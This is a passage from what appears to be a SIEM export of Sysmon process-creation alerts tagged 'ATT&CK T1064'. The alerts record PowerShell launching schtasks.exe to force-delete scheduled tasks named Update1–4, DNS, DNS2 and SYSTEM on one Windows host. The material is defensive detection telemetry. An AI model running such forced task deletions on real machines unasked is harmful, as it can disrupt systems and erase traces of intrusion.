10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.208"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001016e91900}"",""processId"":""4384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.436",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.147 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00107fe71900} +ProcessId: 3384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.150169400Z"",""eventRecordID"":""2236"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.147\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00107fe71900}\r\nProcessId: 3384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.147"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00107fe71900}"",""processId"":""3384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.422",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.103 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00109ce51900} +ProcessId: 1736 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.124187300Z"",""eventRecordID"":""2235"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.103\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00109ce51900}\r\nProcessId: 1736\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.103"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00109ce51900}"",""processId"":""1736"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.385",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.051 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010c3e31900} +ProcessId: 1772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.084543400Z"",""eventRecordID"":""2234"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.051\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010c3e31900}\r\nProcessId: 1772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.051"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010c3e31900}"",""processId"":""1772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.369",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.016 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010e5e11900} +ProcessId: 5384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.018597700Z"",""eventRecordID"":""2233"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.016\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010e5e11900}\r\nProcessId: 5384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.016"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010e5e11900}"",""processId"":""5384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.339",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.990 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-00100be01900} +ProcessId: 3984 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.993811100Z"",""eventRecordID"":""2232"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.990\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-00100be01900}\r\nProcessId: 3984\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:36.990"",""processGuid"":""{df9fc3d3-b360-5ecf-0000-00100be01900}"",""processId"":""3984"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.321",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:36.950 +ProcessGuid: {df9fc3d3-b360-5ecf-0000-001023de1900} +ProcessId: 6752 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:36.953636600Z"",""eventRecordID"":""2231"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:36.950\r\nProcessGuid: {df9fc3d3-b360-5ecf-0000-001023de1900}\r\nProcessId: 6752\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: 